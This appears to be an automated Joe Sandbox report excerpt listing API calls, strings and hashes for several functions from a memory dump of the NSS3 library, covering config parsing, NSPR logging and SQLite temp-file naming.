String ID: rv = %s$ rv = 0x%x$CKR_BUFFER_TOO_SMALL$CKR_CRYPTOKI_ALREADY_INITIALIZED$CKR_CRYPTOKI_NOT_INITIALIZED$CKR_CURVE_NOT_SUPPORTED$CKR_DEVICE_ERROR$CKR_DEVICE_MEMORY$CKR_DEVICE_REMOVED$CKR_DOMAIN_PARAMS_INVALID$CKR_ENCRYPTED_DATA_INVALID$CKR_ENCRYPTED_DATA_LEN_RANGE$CKR_FUNCTION_CANCELED$CKR_FUNCTION_NOT_PARALLEL$CKR_FUNCTION_REJECTED$CKR_INFORMATION_SENSITIVE$CKR_MUTEX_BAD$CKR_MUTEX_NOT_LOCKED$CKR_NEW_PIN_MODE$CKR_NEXT_OTP$CKR_OBJECT_HANDLE_INVALID$CKR_OK$CKR_OPERATION_ACTIVE$CKR_OPERATION_CANCEL_FAILED$CKR_OPERATION_NOT_INITIALIZED$CKR_PIN_EXPIRED$CKR_PIN_INCORRECT$CKR_PIN_INVALID$CKR_PIN_LEN_RANGE$CKR_PIN_LOCKED$CKR_RANDOM_NO_RNG$CKR_RANDOM_SEED_NOT_SUPPORTED$CKR_SAVED_STATE_INVALID$CKR_SIGNATURE_INVALID$CKR_SIGNATURE_LEN_RANGE$CKR_STATE_UNSAVEABLE$CKR_TEMPLATE_INCOMPLETE$CKR_TEMPLATE_INCONSISTENT$CKR_TOKEN_NOT_PRESENT$CKR_TOKEN_NOT_RECOGNIZED$CKR_TOKEN_RESOURCE_EXCEEDED$CKR_TOKEN_WRITE_PROTECTED$CKR_WRAPPED_KEY_INVALID$CKR_WRAPPED_KEY_LEN_RANGE$CKR_WRAPPING_KEY_HANDLE_INVALID$CKR_WRAPPING_KEY_SIZE_RANGE$CKR_WRAPPING_KEY_TYPE_INCONSISTENT
API String ID: 3558298466-1980531169
Opcode ID: 5a7c4f0af810892cdd1fe2ae97ff9aeb9744094d2099fcb33684090b20bf8002
Instruction ID: 23f63550a0c9e0d48c6ca1ec8f6b75a0e92799327b25778a2e37f10099c4d818
Opcode Fuzzy Hash: 5a7c4f0af810892cdd1fe2ae97ff9aeb9744094d2099fcb33684090b20bf8002
Instruction Fuzzy Hash: 0061243064D041C6DA1C88CFCDAF36D31249B07304F6099B7E68D9EE91D6B5CA63479B

Function 6C5D5DE0 Relevance: 63.3, APIs: 27, Strings: 9, Instructions: 272COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?), ref: 6C5D5E08
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5D5E3F
PL_strncasecmp.NSS3(00000000,readOnly,00000008), ref: 6C5D5E5C
free.MOZGLUE(00000000), ref: 6C5D5E7E
free.MOZGLUE(00000000), ref: 6C5D5E97
PORT_Strdup_Util.NSS3(secmod.db), ref: 6C5D5EA5
_NSSUTIL_EvaluateConfigDir.NSS3(00000000,?,?), ref: 6C5D5EBB
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5D5ECB
PL_strncasecmp.NSS3(00000000,noModDB,00000007), ref: 6C5D5EF0
free.MOZGLUE(00000000), ref: 6C5D5F12
NSSUTIL_ArgGetParamValue.NSS3(flags,?), ref: 6C5D5F35
PL_strncasecmp.NSS3(00000000,forceSecmodChoice,00000011), ref: 6C5D5F5B
free.MOZGLUE(00000000), ref: 6C5D5F82
PL_strncasecmp.NSS3(?,configDir=,0000000A), ref: 6C5D5FA3
PL_strncasecmp.NSS3(?,secmod=,00000007), ref: 6C5D5FB7
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C5D5FC4
free.MOZGLUE(00000000), ref: 6C5D5FDB
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5D5FE9
free.MOZGLUE(00000000), ref: 6C5D5FFE
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5D600C
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5D6027
PR_smprintf.NSS3(%s/%s,?,00000000), ref: 6C5D605A
PR_smprintf.NSS3(6C6AAAF9,00000000), ref: 6C5D606A
free.MOZGLUE(00000000), ref: 6C5D607C
free.MOZGLUE(00000000), ref: 6C5D609A
free.MOZGLUE(00000000), ref: 6C5D60B2
free.MOZGLUE(?), ref: 6C5D60CE

Strings

%s/%s, xrefs: 6C5D6055
secmod.db, xrefs: 6C5D5EA0
pkcs11.txt, xrefs: 6C5D5F47, 6C5D5F7C, 6C5D603A, 6C5D6053
flags, xrefs: 6C5D5E3A, 6C5D5EC6, 6C5D5F30
noModDB, xrefs: 6C5D5EEA
configDir=, xrefs: 6C5D5F9D
secmod=, xrefs: 6C5D5FB1
readOnly, xrefs: 6C5D5E56
forceSecmodChoice, xrefs: 6C5D5F55

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$L_strncasecmpValue$Param$FetchR_smprintfisspace$ConfigEvaluateParameterSkipStrdup_Util
String ID: %s/%s$configDir=$flags$forceSecmodChoice$noModDB$pkcs11.txt$readOnly$secmod.db$secmod=
API String ID: 1427204090-154007103
Opcode ID: 946da65442a49f7b46def4c84e794c880f6b3855c477b866af1f2b32cae88be3
Instruction ID: ce046a09fbb0afae64732d294ce97d5d9aca7c8107b55a4ad637b7cf5d323f86
Opcode Fuzzy Hash: 946da65442a49f7b46def4c84e794c880f6b3855c477b866af1f2b32cae88be3
Instruction Fuzzy Hash: 9F91F9F09043425BEB009F6D9C85B9A3BA4DF0634CF490460EC55DBB42E736F956CBAA

Function 6C561D90 Relevance: 45.7, APIs: 16, Strings: 10, Instructions: 182filestringCOMMON

Download Yara Rule

APIs

PR_NewLock.NSS3 ref: 6C561DA3

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES), ref: 6C561DB2

Part of subcall function 6C561240: TlsGetValue.KERNEL32(00000040,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561267
Part of subcall function 6C561240: EnterCriticalSection.KERNEL32(?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C56127C
Part of subcall function 6C561240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C561291
Part of subcall function 6C561240: PR_Unlock.NSS3(?,?,?,?,6C56116C,NSPR_LOG_MODULES), ref: 6C5612A0

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C561DD8
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sync), ref: 6C561E4F
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,bufsize), ref: 6C561EA4
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,timestamp), ref: 6C561ECD
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,append), ref: 6C561EEF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,all), ref: 6C561F17
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C561F34
PR_SetLogBuffering.NSS3(00004000), ref: 6C561F61
PR_GetEnvSecure.NSS3(NSPR_LOG_FILE), ref: 6C561F6E
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C561F83
PR_SetLogFile.NSS3(00000000), ref: 6C561FA2
PR_smprintf.NSS3(Unable to create nspr log file '%s',00000000), ref: 6C561FB8
OutputDebugStringA.KERNEL32(00000000), ref: 6C561FCB
free.MOZGLUE(00000000), ref: 6C561FD2

Strings

Unable to create nspr log file '%s', xrefs: 6C561FB3
NSPR_LOG_FILE, xrefs: 6C561F69
%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n, xrefs: 6C561E27
, %n, xrefs: 6C561E6B
bufsize, xrefs: 6C561E9B
NSPR_LOG_MODULES, xrefs: 6C561DAD
timestamp, xrefs: 6C561EC4
all, xrefs: 6C561F0E
sync, xrefs: 6C561E46
append, xrefs: 6C561EE6

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: _stricmp$Secure$BufferingCriticalDebugEnterFileLockOutputR_smprintfSectionStringUnlockValue__acrt_iob_funccallocfreegetenvstrlen
String ID: , %n$%63[ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_-]%n:%d%n$NSPR_LOG_FILE$NSPR_LOG_MODULES$Unable to create nspr log file '%s'$all$append$bufsize$sync$timestamp
API String ID: 2013311973-4000297177
Opcode ID: 68639006079fe9228cbe8853ad318445bacaa95a597451e27da22b52bb2dcf90
Instruction ID: 5f4cd9c6c7d1fe66019c5566c50d2ed09a2cd2520b48a99a2a7ec8e5ca853831
Opcode Fuzzy Hash: 68639006079fe9228cbe8853ad318445bacaa95a597451e27da22b52bb2dcf90
Instruction Fuzzy Hash: A35196B1E002499BDF00DBF6CD44BAF7BB4AF05309F040525E816DBA11E771D958CBA9

Function 6C646E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C55F9C9,?,6C55F4DA,6C55F9C9,?,?,6C52369A), ref: 6C4FCA7A
Part of subcall function 6C4FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C4FCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C50BE66), ref: 6C646E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C50BE66), ref: 6C646E98
sqlite3_snprintf.NSS3(?,00000000,6C6AAAF9,?,?,?,?,?,?,6C50BE66), ref: 6C646EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C50BE66), ref: 6C646ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C50BE66), ref: 6C646EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C50BE66), ref: 6C646F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C50BE66), ref: 6C646F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C50BE66), ref: 6C646F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C50BE66), ref: 6C646FA6
sqlite3_snprintf.NSS3(?,00000000,6C6AAAF9,00000000,?,?,?,?,?,?,?,6C50BE66), ref: 6C646FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C50BE66), ref: 6C646FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C50BE66), ref: 6C646FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C50BE66), ref: 6C647014
sqlite3_free.NSS3(00000000,?,?,?,?,6C50BE66), ref: 6C64701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C50BE66), ref: 6C647030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C50BE66), ref: 6C64705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C50BE66), ref: 6C647079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C50BE66), ref: 6C647097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C50BE66), ref: 6C6470A0

Strings

winGetTempname5, xrefs: 6C647071
winGetTempname4, xrefs: 6C647046
Phl, xrefs: 6C6470A8
winGetTempname2, xrefs: 6C6470C4
winGetTempname1, xrefs: 6C64708F
mz_etilqs_, xrefs: 6C646F18

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Phl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-1340690522
Opcode ID: eab51c7a71e7ca82bda8d7fc8babf9029526ae670a268ab81caca7ccec44ee22
Instruction ID: bd0e4b4c7ab92ef9cc4a3f5dbdb93ec05f9970cb44d9c4d1f031057805fc6c98
Opcode Fuzzy Hash: eab51c7a71e7ca82bda8d7fc8babf9029526ae670a268ab81caca7ccec44ee22
Instruction Fuzzy Hash: 4B5178B1A0521167E31097319C51FBB36668FD2708F14C538E81296BC2FB26A91FC2EB

Function 6C5D4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000,00000000,00000001), ref: 6C5D5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2,00000000), ref: 6C5D5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C5D5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C5D50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C5875C2), ref: 6C5D50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C5D50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5D5153
free.MOZGLUE(?), ref: 6C5D516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C5D517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5D5195

Strings

parameters=, xrefs: 6C5D506B
name=, xrefs: 6C5D5057
config=, xrefs: 6C5D509B
nss=, xrefs: 6C5D5083
library=, xrefs: 6C5D5043

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: b2485107b2aedbc22b82eccf5410ed10fcd30a223e7b33cf144c6bdde55d1278
Instruction ID: 83691f226b604ea817f0e98f0d0e057d357a7f0d3413b69a6deeee6210dc9047
Opcode Fuzzy Hash: b2485107b2aedbc22b82eccf5410ed10fcd30a223e7b33cf144c6bdde55d1278
Instruction Fuzzy Hash: B651D7F1A01316ABEB00DF68DC41AAA37B8DF06248F550424EC59E7741EB35F915CBBA

Function 6C5D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4C5B
PR_smprintf.NSS3(6C6AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5D4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5D4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5D4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C5C4F51,00000000), ref: 6C5D4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C5D4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C5D4DA2
free.MOZGLUE(?), ref: 6C5D4DB9
free.MOZGLUE(00000000), ref: 6C5D4DCF

Strings

rootFlags, xrefs: 6C5D4D47
timeout, xrefs: 6C5D4C91
0x%08lx=[%s %s], xrefs: 6C5D4D80
any, xrefs: 6C5D4C96
%s,%s, xrefs: 6C5D4C4B
every, xrefs: 6C5D4CA1
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C5D4D9D
rust, xrefs: 6C5D4D22
slotFlags, xrefs: 6C5D4D34
ootT, xrefs: 6C5D4D1A

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 6e911be2f61b503fc9f685c979ca4f5293fe2f24b9b10fe554255dc493ad3cd6
Instruction ID: 704e4dff133d5a0a6c6cbbf2adbdcc15de7cb777dcb1a9408751bf8fbc0d61e4
Opcode Fuzzy Hash: 6e911be2f61b503fc9f685c979ca4f5293fe2f24b9b10fe554255dc493ad3cd6
Instruction Fuzzy Hash: 5C418DB1900241ABDB11AF9D9C84ABB3665AF9630CF1A4125E8164B701E732FD25C7DF

Function 6C5B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C5B6943
Part of subcall function 6C5B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C5B6957
Part of subcall function 6C5B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C5B6972
Part of subcall function 6C5B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C5B6983
Part of subcall function 6C5B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5B69AA
Part of subcall function 6C5B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5B69BE
Part of subcall function 6C5B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5B69D2
Part of subcall function 6C5B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5B69DF
Part of subcall function 6C5B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C5B6A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5B6D8C
free.MOZGLUE(00000000), ref: 6C5B6DC5
free.MOZGLUE(?), ref: 6C5B6DD6
free.MOZGLUE(?), ref: 6C5B6DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C5B6E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5B6E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5B6E72
free.MOZGLUE(?), ref: 6C5B6EA7
free.MOZGLUE(?), ref: 6C5B6EC4
free.MOZGLUE(?), ref: 6C5B6ED5
free.MOZGLUE(00000000), ref: 6C5B6EE3
free.MOZGLUE(?), ref: 6C5B6EF4
free.MOZGLUE(?), ref: 6C5B6F08
free.MOZGLUE(00000000), ref: 6C5B6F35
free.MOZGLUE(?), ref: 6C5B6F44
free.MOZGLUE(?), ref: 6C5B6F5B
free.MOZGLUE(00000000), ref: 6C5B6F65

Part of subcall function 6C5B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C5B781D,00000000,6C5ABE2C,?,6C5B6B1D,?,?,?,?,00000000,00000000,6C5B781D), ref: 6C5B6C40
Part of subcall function 6C5B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C5B781D,?,6C5ABE2C,?), ref: 6C5B6C58
Part of subcall function 6C5B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C5B781D), ref: 6C5B6C6F
Part of subcall function 6C5B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C5B6C84
Part of subcall function 6C5B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C5B6C96
Part of subcall function 6C5B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C5B6CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5B6F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C5B6FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C5B6FF4

Strings

+`\l, xrefs: 6C5B6D0D

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`\l
API String ID: 1304971872-1286210344
Opcode ID: 704dcab6e4648b6020d5b4102bf20291952a3e8bc9fc4e88bc5fcb128e3620ab
Instruction ID: 4f6a9a4e656119860dbb8d0210c99837bb55867a429df1ee852f27b30cf6b2f6
Opcode Fuzzy Hash: 704dcab6e4648b6020d5b4102bf20291952a3e8bc9fc4e88bc5fcb128e3620ab
Instruction Fuzzy Hash: 22B139B5E013099FEF04CBA6DC95B9EBBB4AF09348F140024E815F7640EB31A915CBA1

Function 6C561FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C562007
calloc.MOZGLUE(00000001,00000084), ref: 6C562077
calloc.MOZGLUE(00000001,0000002C), ref: 6C5620DF
TlsSetValue.KERNEL32(00000000), ref: 6C562188
PR_NewCondVar.NSS3 ref: 6C5621B7
calloc.MOZGLUE(00000001,00000084), ref: 6C56221C
InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C5622C2
GetLastError.KERNEL32 ref: 6C5622CD
free.MOZGLUE(00000000), ref: 6C5622DD

Part of subcall function 6C560F00: PR_GetPageSize.NSS3(6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F1B
Part of subcall function 6C560F00: PR_NewLogModule.NSS3(clock,6C560936,FFFFE8AE,?,6C4F16B7,00000000,?,6C560936,00000000,?,6C4F204A), ref: 6C560F25

Strings

T ml, xrefs: 6C562361
X ml, xrefs: 6C56218E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
String ID: T ml$X ml
API String ID: 3559583721-863261814
Opcode ID: f3db0858877fec9cbebbdf9f35ebc2efdee32e129516f82fb057bf8b4a5473ab
Instruction ID: 06e4cdf393db80d17215023ce074b54e7f947fccce0ca670fc67ceeff2295cde
Opcode Fuzzy Hash: f3db0858877fec9cbebbdf9f35ebc2efdee32e129516f82fb057bf8b4a5473ab
Instruction Fuzzy Hash: E0915AB0A017019FDB20EF3ACC89B5B7BF4BB4A719F10452EE45AD6E40DB70A505CB99

